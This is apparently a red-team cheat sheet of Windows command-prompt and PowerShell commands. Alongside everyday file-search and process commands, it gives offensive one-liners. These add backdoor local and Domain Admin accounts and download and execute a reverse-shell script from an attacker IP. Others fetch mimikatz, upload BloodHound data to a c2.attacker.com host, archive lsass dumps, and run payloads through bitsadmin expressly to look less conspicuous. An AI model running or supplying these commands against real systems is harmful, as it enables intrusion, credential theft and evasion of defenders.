Useful commands in Windows #

Windows - Command Prompt #

Find a file #

1	`dir "\secretfile" /s`

Find strings in files #

1	`findstr /s /i "FLAG{" C:\.`

Find multiple words, strings and patterns #

(Equivalent of grep -e WORD1 -e WORD2 -e WORD3)

1	`findstr /C:WORD1 /C:WORD2 /C:WORD3 FILENAME.TXT`

Enable default local "administrator" account #

1	`net user administrator /active:yes`

Adding local accounts (Must have system privileges) #

1 2	`net user trojand imashortpassword /add net localgroup administrators trojand /add`

Adding a Domain Admin account #

net group "Domain Admins"
net user trojandDA P@ssw0rd /add /domain
net group "Domain Admins" trojandDA /add /domain
net group "Domain Admins"

List files using `tree` #

1 2	`tree /f tree /f /a > tree.txt`

Change user password #

1	`net user trojand imareallyreallyreallylongpasswordnow`

Windows Built-in Plink for relay #

1	`netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>`

Show wireless interfaces #

1	`netsh wlan show networks mode=bssid`

Check for logged on users #

1 2	`query user qwinsta`

List local drives¹ #

1 2	`wmic logicaldisk get description,name \| findstr /C:"Local" fsutil fsinfo drives`

bitsadmin⁴ #

Copying a File #

Better than copy. Less conspicuous by having the service do it for you.

1
2

bitsadmin /create JOB & bitsadmin /addfile JOB <LOCAL_SRC> <LOCAL_DST> & bitsadmin /resume JOB & bitsadmin /complete JOB
bitsadmin /create JOB & bitsadmin /addfile JOB %SystemRoot%\System32\cmd.exe C:\Users\Administrator\cmd.exe & bitsadmin /resume JOB & bitsadmin /complete JOB

Execute a file #

Good for executing files as this will run under svchost -k netsvcs as a child process and not under you command prompt

1
2

bitsadmin /create JOB & bitsadmin /addfile JOB <LOCAL_SRC> <LOCAL_DST> & bitsadmin /SetNotifyCmdLine JOB <PROGRAM_NAME> <PARAMETERS> & bitsadmin /resume JOB & bitsadmin /reset
bitsadmin /create JOB & bitsadmin /addfile JOB %TEMP%\test1.txt %TEMP%\test2.txt & bitsadmin /SetNotifyCmdLine JOB C:\Windows\System32\calc.exe NULL & bitsadmin /resume JOB & bitsadmin /reset

Windows - Powershell #

Nested quotes or wrapping multiple double quotes #

Triple double quotes to make one double quote.
In the example below, the whole RCE command is taken as a variable. Think of the single quotes also as the command portion in your RCE expoits.
1
var g = 'powershell -Exec Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString("""http://10.0.1.5:1337/reverse.ps1""")"'
For executing in powershell directly (i.e. interactive powershell), you must use a Grave Accent symbol before the three(3) double quotes.
1
powershell -Exec Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString(`"""http://10.0.1.5:1337/reverse.ps1`""")"
BEWARE: This does not seem to work if you are to encode the whole command (IEX...). Better to encode payload/command from Windows to see if it gives an error

Download & Uploading files #

Ignore bad/untrusted/self-signed certificates

1	`[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}`

Download only ¹

Invoke-WebRequest "http://<KALI_IP>:8000/mimikatz.zip" -Out mimikatz.zip

(New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "C:\Windows\Temp\archive.zip")  

$client = new-object System.Net.WebClient
$client.DownloadFile("http://<KALI_IP>:8000/mimikatz.zip","mimikatz.zip")

Download and execute

1
2

IEX(New-Object System.Net.WebClient).DownloadString("https://10.0.1.5:1337/reverse.ps1")
powershell -Exec Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString(`"""http://10.0.1.5:1337/reverse.ps1`""")"

Uploading files

Setup a Simple HTTP Server for this command.

1
2
3

$uri = "https://c2.attacker.com/bh.zip"
$uploadPath = "C:\Windows\temp\20210101000109_BloodHound.zip"
Invoke-RestMethod -Uri $uri -Method Put -InFile $uploadPath -UseDefaultCredentials

cat, tail, grep in Windows PS #

Reading Files
1
Get-Content output.log

Tail

1 2	`Get-Content output.log -Tail <number of lines> Get-Content output.log -Tail 10`

Tail -f
1
Get-Content output.log -Tail 10 -Wait

Grep

1 2	`Get-Content output.log \| Select-String -Pattern "<pattern>" Get-Content output.log \| Select-String -Pattern "password"`

Grep -A 3

1	`Get-Content output.log \| Select-String -Pattern "password" -Context 0,3`

Tail -f | Grep -A 3

1	`Get-Content output.log -Tail 10 -Wait \| Select-String -Pattern "password" -Context 0,3`

Find files and contents #

Find files with using filenames

1	`Get-ChildItem "C:\" -recurse -filter "password"`

Find contents in files

1	`Get-ChildItem "C:\Users" -recurse \| Select-String -pattern "passw" \| group path \| select name`

Expand Archives #

1	`Expand-Archive Procdump.zip -DestinationPath "C:\temp\" -Force -Verbose`

Compress and Archive #

Powershell 5.0 and greater

Powershell 3.0 ⁶

1 2	`Add-Type -A 'System.IO.Compression.FileSystem' [IO.Compression.ZipFile]::CreateFromDirectory("C:\Windows\Temp\folderContainingLsassDMP", 'C:\Windows\temp\lsass.zip')`

Base64 Encode Powershell commands #

Some use cases:

Encoding² Powershell one-liners

1
2
3

$MYCOMAND = "Invoke-WebRequest -Uri 'http://www.contoso.com' -OutFile 'C:\path\file'"
$ENCODED = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($MYCOMMAND))
Write-Output $ENCODED

List directory and sort by Date Time #

Useful when trying to delete any files written to disk (i.e. procdump64.exe/lsassy.exe) and need to sort out through bunch of files (i.e. C:\Windows\temp)
Command Prompt
1
dir /od
Powershell (sorted by date(LastWriteTime). For sorting via other datetime fields, just press “TAB”)
1
Get-ChildItem .\|Sort-Object LastWriteTime

Tasklist #

Find PID of a process
CMD
1
tasklist /fi "imagename eq lsass.exe"
Powershell
1
Get-Process lsass

Taskkill #

Killing tasks after tasklist /V ⁵
Useful when killing command and process which did not working and pressing Ctrl+C exited the whole terminal
1 2
taskkill /PID 1234 taskkill /F /IM cmd.exe

Last update: April 16, 2022